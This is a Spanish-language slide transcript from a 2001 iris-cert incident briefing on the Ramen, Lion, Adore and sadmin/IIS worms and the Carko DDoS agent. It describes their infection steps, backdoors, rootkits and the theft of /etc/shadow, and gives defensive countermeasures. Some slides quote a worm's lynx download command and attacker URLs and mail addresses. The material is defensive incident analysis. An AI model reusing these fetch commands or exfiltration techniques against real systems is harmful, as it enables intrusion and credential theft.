Grupos de Trabajo RedIRIS' Mayo 2001

About This Presentation
Title:

Grupos de Trabajo RedIRIS' Mayo 2001

Description:

Si la versi n del router lo permite limitar el n mero de mensajes SA (Source Announcement) ... Controlar mails de salida al dominio chica.com. Lionfind v 0.1 ... – PowerPoint PPT presentation

Number of Views:45
Avg rating:3.0/5.0
Slides: 21
Provided by: Javi47

less

Transcript and Presenter's Notes

Title: Grupos de Trabajo RedIRIS' Mayo 2001


1
Grupos de TrabajoRedIRIS. Mayo 2001
  • Grupo de Coordinación iris-cert
  • Incidentes de Seguridad. Últimas tendencias.

2
Agenda
  • Linux Worms
  • Ramen Worm
  • http//www.cert.org/incident_notes/IN-2001-01.html
  • http//www.sans.org/y2k/ramen.htm
  • Lion Worm
  • http//www.cert.org/incident_notes/IN-2001-03.html
  • http//www.sans.org/y2k/lion.htm
  • Adore Worm (Red Worm)
  • http//www.sans.org/y2k/adore.htm
  • sadmin/IIS Worm
  • http//www.cert.org/advisories/CA-2001-11.html
  • Solaris DDoS agents
  • Carko DDoS Agent
  • http//www.sans.org/y2k/carko.htm
  • http//www.securityfocus.com/archives/75/177265

3
Ramen Worm. Sistemas afectados
  • Red Hat 6.2 intel ?
  • wu-ftpd (puerto 21/tcp)
  • http//www.redhat.com/support/errata/RHSA-2000-039
    -02.html
  • rpc.statd (puerto 111/tcp) (nfs-utils)
  • http//www.redhat.com/support/errata/RHSA-2000-043
    -03.html
  • Red Hat 7.0 intel ?
  • LPrng (puerto 515/tcp)
  • http//www.redhat.com/support/errata/RHSA-2000-065
    -06.html

4
Ramen Worm. Descripción
  • lynx -d http//FROMADDR27374 gt
    /usr/src/.poop/ramen.tgz y /tpm/ramen.tgz
  • Informa gb31337_at_hotmail.com y gb31337_at_yahoo.com
  • Modifica index.html y elimina /etc/hosts.deny
  • Añade un script en /etc/rc.d/rc.sysinit para
    iniciar escaneos y exploits al arrancar el
    sistema
  • Añade el servicio asp (/etc/inetd.conf,
    /etc/xinetd.conf). Mini servidor Web en el puerto
    27374.
  • Añade ftp y anonymous /etc/ftpusers
  • Red Hat 6.2
  • Elimina servicios rpc.statd y rpc.rstatd y borra
    /sbin/rpc.statd y /usr/sbin/rpc.statd
  • Red Hat 7.0
  • Elimina servicio lpd y borra /usr/sbin/lpd
  • Comienza actividad de propagación
  • Se escanean clases B aleatorias buscando sistemas
    vulnerables (21/tcp)
  • En paralelo se lanzan los exploits (RH 6.2
    rpc.statd, wu-ftp, RH 7.0 lprng)

5
Ramen Worm. Variaciones
  • Modificación de binarios del sistema login, lpd
    (Stacheldracht agent), ps y netstat
  • http//www.sans.org/y2k/stacheldraht.htm
  • Añade /etc/rc.d/rc.sysinit la ejecución del
    agente DDoS
  • Envía el contenido del /etc/shadow a libero y
    chicha y elimina evidencias en /var/log/mailog
  • Añade dos entradas en el crontab
  • El primer día de cada mes activa el agente de
    DDoS
  • Cada día a la 1am para la ejecución scripts de
    escaneo (syscan)

6
Ramen Worm y Multicast
  • Elección aleatoria de direcciones a escanear ?
    direcciones clase D (direcciones multicast
    224.0.0.0/4)
  • Se puede generar una tormenta de paquetes MSDP
    que dejen fuera de servicio a los routers que
    utilicen este protocolo
  • Recomendación
  • Denegar paquetes con origen una dirección
    multicast
  • Denegar trafico TCP a direcciones multicast
  • Limitar el tráfico MSDP para proteger el router
    de ataques externos
  • Si la versión del router lo permite limitar el
    número de mensajes SA (Source Announcement)

7
Ramen Worm. Medidas preventivas. Detección y
eliminación
  • Aplicar parches de los vendedores ó
  • Filtrar paquetes TCPSYN con origen o destino al
    puerto 27374
  • Desactivar FTP/RPC en todas las máquinas donde no
    se necesite
  • No permitir acceso a servicios RPC fuera de
    nuestra red, incluyendo NFS
  • No permitir accesos a servicios LPR fuera de
    nuestra red
  • Escanear nuestras redes buscando máquinas con el
    puerto 27374 abierto
  • Ramenfind v 0.4
  • http//www.ists.dartmouth.edu/IRIA/knowledge_base/
    tools/ramenfind.html
  • Chkrootkit
  • http//www.chkrootkit.org/

8
Lion Worm. Sistemas afectados
  • Máquinas Linux (arquitectura x86) que corren
    servidores DNS BIND vulnerables (8.2, 8.2-P1,
    8.2.1, 8.2.2-Px y 8.2.3-betas)
  • http//www.cert.org/advisories/CA-2001-02.html
  • CERT Advisory CA-2001-02, Multiple
    Vulnerabilities in BIND
  • http//www.isc.org/products/BIND/bind-security.htm
    l
  • Escanea clases B aleatorias en busca de máquinas
    con el puerto 53/tcp abierto y vulnerable.
    Ejecuta exploit named e instala un rootkit
    (t0rn)
  • http//www.sans.org/y2k/t0rn.htm

9
Lion worm. Descripción
  • /dev/.lib
  • http//coollion.51.net/crew.tgz li0n.tgz
  • Envía el contenido de /etc/passwd, /etc/shadow y
    ifconfig -a a direcciones de china.com
  • Elimina /etc/hosts.deny y .bash_history
  • Introduce una puerta trasera en el puerto
    60008/tcp y 33567/tcp (vía inetd)
  • Introduce una versión modificada del ssh
    (33568/tcp) (/usr/sbin/nscd)
  • Elimina el servicio syslogd
  • Instala tr0n (modificación du, find, ifconfig,
    in.telnetd, login, ls, netstat, ps, pstree, top,
    in.fingerd. Nuevos binarios t0rn, tfn, mjy)

10
Lion Worm. Variaciones
  • Comportamiento parecido al Ramen
  • Modifica index.html
  • Instala un mini servidor WWW en 27374 para
    autopropagación
  • Variaciones en los puertos de las puertas
    traseras (10008/tcp, 1008/tcp)
  • No instala rootkit, se limita a propagarse de
    máquina en máquina
  • Puede instalar la herramienta de DDoS TFN2K
    (Tribbe Flood Network)
  • http//www.cert.org/advisories/CA-1999-17.html

11
Lion Worm. Medidas preventivas. Detección y
eliminación
  • Actualizar a una versión no vulnerable del BIND ó
  • Controlar tráfico en nuestra red perímetro
  • Controlar tráfico entrante a los puertos
    1008/tcp, 60008/tcp, 10008/tcp, 33567/tcp y
    33568/tcp
  • Controlar mails de salida al dominio chica.com
  • Lionfind v 0.1
  • http//www.ists.dartmouth.edu/IRIA/knowledge_base/
    tools/lionfind.html
  • Chkroottkit
  • http//www.chkrootkit.org/
  • find_ddos
  • http//www.nipc.gov/warnings/alerts/1999/find_ddos
    _v42_sparc.tar.Z

12
Adore Worm. Sistemas afectados
  • Máquinas Linux (arquitectura x86)
  • Servicios vulnerables
  • wu-ftpd
  • rpc.statd
  • LPrng
  • BIND

13
Adore worm. Descripción
  • Sustituye el ps por una versión modificada
  • ps original se conserva en /usr/bin/adore
  • Envía adore9000_at_21cn.com, adore9000_at_sina.com,
    adore9001_at_21cn.com, adore9001_at_sina.com
  • /etc/ftpusers, ifconfig, ps -aux,
    /root/.bash_history, /etc/hosts, /etc/shadow
  • Ejecuta icmp (escucha en un puerto determinado
    en espera de un paquete ICMP echo request de una
    longitud determinada) ? Abre una shell de root en
    el puerto 65535/tcp
  • cron.daily (0402 am) ? elimina todas las trazas
    de la existencia del gusano y reinicia la máquina

14
Adore Worm. Variaciones
  • /dev/.shit
  • red.tgz, butcher.tgz
  • Añade dos usuarios dead y h
  • Envía un mail a dvsowned_at_gmx.net,
    dvsowned_at_hotmail.com
  • Sock ? instala un backdoor
  • Necesita GLIBC_2.1.3
  • Utilización de un módulo cargable del núcleo
    (Adore LKM) que permitiría al atacante ocultar
    procesos, archivos, puertas traseras, de una
    forma trasparente ? Dificultad para su detección
  • Desactivar la posibilidad de cargar módulos en el
    kernel

15
Adore Worm. Detección y eliminación
  • Knark
  • http//www.hsc.fr/ressources/outils/rkscan/index.h
    tm.en
  • Adorefind
  • http//www.ists.dartmouth.edu/IRIA/knowledge_base/
    tools/adorefind.html
  • Chkrootkit
  • http//www.chkrootkit.org/

16
Sadmin/IIS Worm. Sistemas afectados
  • Solaris 2.6, 2.7 (sparc) ?
  • Sun Solstice AdminSuite Damemon sadmin
  • http//www.cert.org/advisories/CA-1999-16.html
  • Windows NT ?
  • Microsoft IIS 4.0 y 5.0
  • http//www.kb.cert.org/vuls/id/111677

17
Sadmin/IIS Worm. Descripción
  • Solaris
  • Crea una shell de root en el puerto 600/tcp y
    utiliza este puerto para enviar comandos a la
    víctima (nc)
  • Incluye , en /root/.rhosts para permitir
    conexiones remotas
  • Se transfiere vía rpc (/dev/cuc)
  • Modifica /etc/rc2.d/S71rpc para que los scripts
    de escaneo se inicien si se reinicia el sistema
  • Instala perl-5.0005_03 desde http//202.96.209.10
    80/ (necesario para lanzar el exploit contra Win
    NT)
  • Comienza actividad escaneadora
  • Intentando buscar tanto sistemas Solaris como NT
    vulnerables
  • Resultado /dev/cub
  • Windows NT
  • Modificación index.html
  • Podría realizar otro tipo de actividades
    destructivas

18
Sadmin/IIS Worm. Medidas preventivas. Detección
  • Aplicar parches recomendados
  • Evitar servicios innecesarios o controlar el
    acceso a estos desde fuera de la red
  • No utilizar comando r (rpc ? scp)
  • Chequear /dev/cub y /dev/cuc
  • Chequear contenido /root/.rhosts y buscan
    modificaciones en el /etc/rc2.d/S71rpc

19
Carko DDoS Agent. Descripción
  • Basado en Stacheldraht v1.666 antigl yps
    DDoS tool
  • http//xforce.iss.net/alerts/advise61.asp
  • IP Masters hardcoded
  • 209.198.242.114 vs 3.3.3.3 para probar spoofing
  • /usr/share/man/mansps/ddos/carko
  • td ? carko
  • snmpXmdmi (Solaris 2.6, 7 y 8 sparc)
  • http//www.cert.org/advisories/CA-2001-05.htm
  • Escaneos intensivos al puerto 111/tcp,udp con
    peticiones explícitas al servicio snmpXmdmi (id
    1000249)
  • shell de root 530/tcp (courier) para instalar
    software adicional.

20
Alguna Pregunta?
Write a Comment
User Comments (0)
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "Grupos de Trabajo RedIRIS' Mayo 2001" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!